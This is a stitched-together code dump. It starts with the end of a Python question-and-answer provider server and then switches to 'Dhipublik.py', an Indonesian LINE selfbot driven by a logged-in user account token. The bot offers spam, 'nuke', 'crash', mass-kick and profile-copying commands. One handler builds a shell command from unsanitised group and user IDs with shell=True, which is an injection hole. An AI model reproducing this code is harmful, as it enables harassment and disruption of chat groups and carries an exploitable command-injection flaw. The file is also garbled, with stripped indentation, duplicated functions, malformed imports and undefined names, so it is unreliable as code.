# Getting questions and sending answers
if state == 1:
active = True
provider_lock.acquire()
try:
active = provider_int.is_subscription_active(customer_address)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if not active:
print(shorten_addr(customer_address), "Subscription no longer active.")
conn.close()
print(shorten_addr(customer_address), "Closing connection", addr)
return
provider_lock.acquire()
try:
demanding = customer_address in provider_int.customers_demanded
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if demanding:
continue
# Dismiss Broken Messages
if not msg:
break
if "type" not in msg:
continue
# Handle Msgs by Types
elif msg["type"] == "new_question":
# Decode Message
question = Coder.stream_to_encoded(msg["question"])
hashes = str_to_bytes(msg["hashes"])
unanswered = msg["unanswered"]
signature = str_to_bytes(msg["signature"])
print(shorten_addr(customer_address), "Got new question:", Coder.str_question(question))
# Register Ack
closed = []
provider_lock.acquire()
try:
closed = provider_int.register_ack(customer_address, Ack(hashes, unanswered, signature))
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if closed is None:
print(shorten_addr(customer_address), "Invalid ack! Ignoring.")
continue
for q in closed:
print(shorten_addr(customer_address), "Got new answer ack:", Coder.str_question(q))
# Check for Overflow
overflow = False
provider_lock.acquire()
try:
overflow = provider_int.can_overflow(customer_address)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if overflow:
print(shorten_addr(customer_address), "Max queries met! Ignoring.")
continue
#Register Question
qa = QA(question)
h = qa.get_hash()
if h not in hashes:
print(shorten_addr(customer_address), "Question not in hashes! Ignoring.")
ret = False
provider_lock.acquire()
try:
ret = provider_int.register_question(customer_address, question)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if not ret:
print(shorten_addr(customer_address), "Invalid question! Ignoring.")
elif msg["type"] == "ack":
# Decode Msg
hashes = str_to_bytes(msg["hashes"])
unanswered = msg["unanswered"]
signature = str_to_bytes(msg["signature"])
# Register Ack
closed = []
provider_lock.acquire()
try:
closed = provider_int.register_ack(customer_address, Ack(hashes, unanswered, signature))
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if closed is None:
print(shorten_addr(customer_address), "Got useless ack...")
elif len(closed) < 1:
print(shorten_addr(customer_address), "Got stale ack")
else:
for q in closed:
print(shorten_addr(customer_address), "Got new answer ack:", Coder.str_question(q))
elif msg["type"] == "send_answer":
# Check if specific question needed (currently useless)
question = None
if "question" in msg:
question = Coder.stream_to_encoded(msg["question"])
q = question
if q is not None:
q = Coder.str_question(q)
print(shorten_addr(customer_address), "Asking for new answers, prefered question:", q)
# Get all qas
qas = []
provider_lock.acquire()
try:
qas = provider_int.get_new_answers(customer_address)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
# Send all answers
questions = [Coder.encoded_to_stream(qa.get_question()) for qa in qas]
answers = [Coder.encoded_to_stream(qa.get_answer()) for qa in qas]
#print(shorten_addr(customer_address), "Almost sent answers:", len(answers))
if PROVIDER_APPEAL_ONLY:
questions = answers = []
send_dict(conn, {
"type": "answer",
"questions": questions,
"answers": answers
})
print(shorten_addr(customer_address), "Sent answers:", len(answers))
else:
print(shorten_addr(customer_address), "??? Received: " + str(msg))
print(shorten_addr(customer_address), "Ended Connection.")
if __name__ == '__main__':
#print(sys.argv)
#print(len(sys.argv))
if(len(sys.argv) < 2):
print("USAGE: <filename> address [port]")
sys.exit()
address = sys.argv[1]
port = PORT
if(len(sys.argv) > 2):
port = int(sys.argv[2])
from main import HOST
init_provider(address, HOST, port)
|
Dhipublik.py
|
# -*- coding: utf-8 -*-
import Adhi
from Adhi.lib.curve.ttypes import *
from datetime import datetime
import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, wikipedia, tempfile
from bs4 import BeautifulSoup
from urllib import urlopen
import requests
from io import StringIO
from threading import Thread
#from gtts import gTTS
from googletrans import Translator
cl = Adhi.LINE()
#cl.login(qr=True)
cl.login(token='isi anu')#ranita
cl.loginResult()#
kc = kl = cl
satpam = kk = ki = cl
print "════n/SUKSES BOSS\n════"
reload(sys)
sys.setdefaultencoding('utf-8')
#album = None
#image_path = 'tmp/tmp.jpg'
helpMessage ="""
╔═════════════
║ TEAM BOT ADHI
╠═════════════
|Key1
║|Key2
║|Key3
║|Say (txt)
║|Kr say (text)
|Apakah (text)
║|Kapan (txt)
║|welcome
║|.. (text)
║|Time
║|rate @
║|Gcreator
║|Creator
║|Spam on (jml) (Text)
║|image
║|ig
║|youtube
║|lirik
║|music
║|zodiAK
║|Mimic
║|Getcover @
║|Tag on/off
║|Getpp @
║|Getinfo @
║|Getinfo2
║|Njoin on/off
║|Nleave on/off
║|setview
║|viewseen
║|CCtv
║|Intip
║|Crot (tagall)
║|Absen
║|Gift
║|ranita pergi (ngeluarkan bot)
║|Kr pergi (ngeluarkan bot)
║╚════════════
║ UNTUK PUBLIK
║ SILAHKAN GUNAKAN
╚═════════════
"""
protectMessage ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
║ line://ti/p/~krissthea
╠═════════════
║╔════════════
║╠❂͜͡⚡➣qr on/oғғ
║╠❂͜͡⚡➣gυeѕт on/oғғ
║╠❂͜͡⚡➣мeмвer on/oғғ
║╠❂͜͡⚡➣groυp on/oғғ
║╠❂͜͡⚡➣ĸιcĸ on/oғғ
║╠❂͜͡⚡➣cancel on/oғғ
║╚════════════
╚═════════════
"""
socmedMessage ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
║ line://ti/p/~krissthea
╠═════════════
║╔════════════
║╠❂͜͡🌟➣wιĸι [тeхт]
║╠❂͜͡🌟➣ιg [тeхт]
║╠❂͜͡🌟➣ιмage [тeхт]
║╠❂͜͡🌟➣vιdeo [тeхт]
║╠❂͜͡🌟➣zodιaĸ [тeхт]
║╠❂͜͡🌟➣yoυтυвe [тeхт]
║╠❂͜͡🌟➣lιrιĸ [тeхт]
║╠❂͜͡🌟➣ιdlιne [тeхт]
║╠❂͜͡🌟➣мυѕιc [тeхт]
║╠❂͜͡🌟➣тιмe [тιмe]
║╠❂͜͡🌟➣ѕay [тeхт]
║╚════════════
╚═════════════
"""
translateMessage ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
║ line://ti/p/~krissthea
╠═════════════
║╔════════════
║╠☔тr-ιd = ιndoneѕιa
║╠☔тr-мy = мyanмar
║╠☔тr-en = englιѕн
║╠☔тr-тн = тнaιland
║╠☔тr-ja = japaneѕe
║╠☔тr-мѕ = мalayѕιa
║╠☔тr-ιт = ιтalιan
║╠☔тr-тr = тυrĸιѕн
║╠☔тr-aғ = aғrιĸaanѕ
║╠☔тr-ѕq = alвanιan
║╠☔тr-aм = aмнarιc
║╠☔тr-ar = araвιc
║╠☔тr-нy = arмenιan
║╚════════════
╚═════════════
"""
botMessage ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
║ line://ti/p/~krissthea
╠═════════════
║╔════════════
║╠❂͜͡⚡➣nĸ [naмe]
║╠❂͜͡⚡➣vĸ [naмe]
║╠❂͜͡⚡➣nυĸe
║╠❂͜͡⚡➣lυrĸιng > Cctv
║╠❂͜͡⚡➣тeѕ
║╠❂͜͡⚡➣reѕpon
║╠❂͜͡⚡➣ѕpeed
║╠❂͜͡⚡➣glιѕт
║╠❂͜͡⚡➣тagall/Crot
║╠❂͜͡⚡➣reѕтarт
║╠❂͜͡⚡➣cn [тeхт]
║╠❂͜͡⚡➣cѕ [тeхт]
║╠❂͜͡⚡➣мe
║╠❂͜͡⚡➣craѕн
║╚════════════
╚═════════════
"""
settingMessage ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
║ line://ti/p/~krissthea
╠═════════════
║╔════════════
║╠❂͜͡🌟➣ѕeт
║╠❂͜͡🌟➣тag on/oғғ
║╠❂͜͡🌟➣тag2 on/oғғ
║╠❂͜͡🌟➣aυтolιĸe on/oғғ
║╠❂͜͡🌟➣add on/oғғ
║╠❂͜͡🌟➣joιn on/oғғ
║╠❂͜͡🌟➣ѕнare on/oғғ
║╠❂͜͡🌟➣coммenт on/oғғ
║╠❂͜͡🌟➣ĸ on/oғғ
║╠❂͜͡🌟➣njoιn on/oғғ
║╠❂͜͡🌟➣nleave on/oғғ
║╚════════════
╚═════════════
"""
giftMessage ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
║ line://ti/p/~krissthea
╠═════════════
║╔════════════
║╠❂͜͡🌟➣gιғт
║╠❂͜͡🌟➣gιғт 1
║╠❂͜͡🌟➣gιғт 2
║╠❂͜͡🌟➣gιғт 3
║╚════════════
╚═════════════
"""
stealMessage ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
║ line://ti/p/~krissthea
╠═════════════
║╔════════════
║╠❂͜͡🌟➣geтnaмe @
║╠❂͜͡🌟➣geтвιo @
║╠❂͜͡🌟➣geтιnғo @
║╠❂͜͡🌟➣geтpp @
║╠❂͜͡🌟➣geтcover @
║╠❂͜͡🌟➣geтмιd @
║╠❂͜͡🌟➣geтgroυp
║╠❂͜͡🌟➣ѕeтιмage [lιnĸ]
║╠❂͜͡🌟➣papιмage
║╠❂͜͡🌟➣ѕeтvιdeo [lιnĸ]
║╠❂͜͡🌟➣papvιdeo
║╠❂͜͡🌟➣мycopy @
║╠❂͜͡🌟➣мyвacĸυp
║╚════════════
╚═════════════
"""
KAC=[cl,ki,kk,kc,kl]
mid = cl.getProfile().mid
Smid = satpam.getProfile().mid
Bots=[mid]
owner=["mid lu",mid]
admin=["mid lu",mid]
baby=["mid rekan bot"]#chery/barby/ranita
creator=["u31ef22df7f538df1d74dc7f756ef1a32","u9cc2323f5b84f9df880c33aa9f9e3ae1"]
owner=["u31ef22df7f538df1d74dc7f756ef1a32","u9cc2323f5b84f9df880c33aa9f9e3ae1"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':False,
'timeline':False,
'autoAdd':True,
'message':"""👉😊☆º°˚˚☆✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰☆º°˚˚☆(^ω^)\n\nby Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««""",
"lang":"JP",
"comment":"""👉😊☆º°˚˚☆✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰☆º°˚˚☆(^ω^)\n\nby Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««""",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"QrProtect":False,
"MProtection":False,
"Protectguest":False,
"Protectcancel":False,
"autoKick":False,
"auto":True,
"tag":False,
"tag2":False,
"likeOn":False,
"Mimic":False,
"mimic":False,
"winvite":False,
"winvite2":False,
"Wc":False,
"Lv":False,
"pname":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
"protectionOn":False,
"atjointicket":True
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
setTime = {}
setTime = wait2['setTime']
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = cl.getProfile()
profile = cl.getProfile()
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
mulai = time.time()
agent = {'User-Agent' : "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"}
def translate(to_translate, to_language="auto", language="auto"):
bahasa_awal = "auto"
bahasa_tujuan = to_language
kata = to_translate
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
return result
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version: #If the Current Version of Python is 3.0 or above
import urllib,request #urllib library for Extracting web pages
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib,request.Request(url, headers = headers)
resp = urllib,request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else: #If the Current Version of Python is 2.x
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
#Finding 'Next Image' from the given raw page
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
#def autolike():
# for zx in range(0,100):
# hasil = cl.activity(limit=100)
# if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
# try:
# cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto Like By TobyBots!!\nID LINE : line://ti/p/~tobyg74\nIG : instagram.com/tobygaming74")
# print "DiLike"
# except:
# pass
# else:
# print "Sudah DiLike"
# time.sleep(500)
#thread2 = threading.Thread(target=autolike)
#thread2.daemon = True
#thread2.start()
#def autolike():
# for zx in range(0,100):
# hasil = cl.activity(limit=100)
# if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
# try:
# cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
# print "Like"
# except:
# pass
# else:
# print "Already Liked"
#time.sleep(500)
#thread2 = threading.Thread(target=autolike)
#thread2.daemon = True
#thread2.start()
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
return image
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self.Talk.client.sendMessage(0,M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n9§9" + Name
wait2['ROM'][op.param1][op.param2] = "9§9" + Name
else:
pass
except:
pass
def sendAudio(self, to_, path):
M = Message(to=to_, text=None, contentType = 3)
M_id = self.Talk.client.sendMessage(0,M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'audio',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
print r
if r.status_code != 201:
raise Exception('Upload audio failure.')
def sendAudioWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download audio failure.')
try:
self.sendAudio(to_, path)
except Exception as e:
raise e
def sendVoice(self, to_, path):
M = Message(to=to_, text=None, contentType = 3)
M.contentPreview = None
M_id = self._client.sendMessage(0,M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'voice_message',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'audio',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload voice failure.')
return True
def mention(to,nama):
aa = ""
bb = ""
strt = int(12)
akh = int(12)
nm = nama
#print nm
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "► @c \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "「Mention」\n"+bb
msg.contentMetadata = {'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
#print msg
try:
cl.sendMessage(msg)
except Exception as error:
print error
def removeAllMessages(self, lastMessageId):
return self._client.removeAllMessages(0, lastMessageId)
def bot(op):
try:
if op.type == 0:
return
if op.type == 13:
if wait["auto"] == True:
cl.acceptGroupInvitation(op.param1)
cl.sendText(op.param1, "Terima Kasih Telah Invite 👉😊☆º°˚˚☆✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰☆º°˚˚☆(^ω^)\n\nby Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««\n\nSilahkan ketik [Help],dan gunakan dgn bijak")
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
ki.findAndAddContactsByMid(op.param1)
kc.findAndAddContactsByMid(op.param1)
kl.findAndAddContactsByMid(op.param1)
kk.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
cl.sendText(op.param1,str(wait["message"]))
kc.sendText(op.param1,str(wait["message"]))
cl.sendText(op.param1,str(wait["message"]))
#------------------NOTIFIED_READ_MESSAGE----------------#
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
if op.type == 26:
msg = op.message
if msg.text is None:
return
if "@"+cl.getProfile().displayName in msg.text:
if wait["tag"] == True:
tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
jawab = ("Kenapa Tag Si "+cl.getProfile().displayName+"Kangen yah..!!!\nPC aja langsung biar anu hihi..!!\n[autoRespon]by=>SelfBot~Kris\n👉Cyber Army Bot👈","Nah ngetag lagi si "+cl.getProfile().displayName+" mending ajak mojok aja dari pada ngetag mulu.. wkwk...!!!\n[autoRespon]by=>SelfBot~Kris\n👉Cyber Army Bot👈")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
if op.type == 26:
msg = op.message
if msg.text is None:
return
if "@"+cl.getProfile().displayName in msg.text:
if wait["tag2"] == True:
tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
jawab = "Kenapa Tag Si "+cl.getProfile().displayName+"Kangen yah..!!!\nPC aja langsung biar anu hihi..!!\n[autoRespon]by=>SelfBot~Kris\n👉Cyber Army Bot👈","Nah ngetag lagi si "+cl.getProfile().displayName+" mending ajak mojok aja dari pada ngetag mulu.. wkwk...!!!\n[autoRespon]by=>SelfBot~Kris\n👉Cyber Army Bot👈"
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.kickoutFromGroup(msg.to,[msg.from_])
else:
cl.inviteIntoGroup(op.param1,admin)
#cl.sendAudio(msg.to,jawaban)
#--CANCEL KICK--#
if op.type == 32:
if wait["Protectcancel"] == True:
if op.param2 not in Bots or staff:
cl.kickoutFromGroup(op.param1,[op.param2])
#------Invite User Kick start------#
if op.type == 13:
if wait["Protectguest"] == True:
if op.param2 not in Bots:
cl.cancelGroupInvitation(op.param1,[op.param3])
cl.kickoutFromGroup(op.param1,[op.param2])
#------Invite User Kick Finish------#
#----MemberProtection------#
if op.type == 19:
if wait["MProtection"] == True:
if op.param2 not in Bots and staff:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
#------Open QR Kick start------#
if op.type == 11:
if wait["QrProtect"] == True:
if op.param2 not in Bots:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.kickoutFromGroup(op.param1,[op.param3])
cl.updateGroup(G)
#------Open QR Kick finish-----#
if op.type == 17:
if wait["Wc"] == True:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1, "╔═════════════\n║Selamat Datang Di " + str(ginfo.name) + "\n╠═════════════\n" + "║Founder =>>> " + str(ginfo.name) + " :\n║" + ginfo.creator.displayName + "\n╠═════════════\n" + "║😊Semoga Betah Kak 😘 \n╠═════════════\n║No Baper,No nakal,No Ngeyel ya..!! \n╚═════════════")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if wait["Lv"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1, "╔═════════════\n║Baper Tuh Orang :v \n╠══════���══════\n║Belum di Anu Kayanya 😊 \n╚═════════════")
print "MEMBER HAS LEFT THE GROUP"
#-----------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = cl.getGroup(op.param1)
except:
try:
G = cl.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = kl.getGroup(op.param1)
except:
try:
G = kt.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
kl.updateGroup(G)
except:
try:
kt.updateGroup(G)
except:
pass
if op.param2 in Bots:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kt.kickoutFromGroup(op.param1,[op.param2])
except:
pass
cl.sendText(op.param1,"please do not change group name-_-")
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin or owner:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
cl.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
cl.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
#--------------NOTIFIED_INVITE_INTO_GROUP----------------
if op.type == 13:
print op.param3
if op.param3 in mid:
if op.param2 in creator:
cl.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in creator:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in creator:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in creator:
kc.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in mid:
if op.param2 in Amid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Bmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
cl.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Amid:
if op.param2 in mid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Cmid:
ki.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Bmid:
if op.param2 in mid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Amid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
kk.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Cmid:
if op.param2 in mid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Amid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Bmid:
kc.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner or mid:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner or mid:
ki.acceptGroupInvitation(op.param1)
else:
ki.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
#====================================================
if mid in op.param3:
if wait["autoJoin"] == True:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
else:
if wait["autoCancel"] == True:
if op.param3 in admin:
pass
else:
cl.cancelGroupInvitation(op.param1, [op.param3])
else:
if op.param3 in wait["blacklist"]:
cl.cancelGroupInvitation(op.param1, [op.param3])
cl.sendText(op.param1, "Itu kicker jgn di invite!")
else:
pass
#-----------------NOTIFIED_KICKOUT_FROM_GROUP-----------------
if op.type == 19:
if op.param3 in admin:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,admin)
cl.inviteIntoGroup(op.param1,[op.param3])
else:
pass
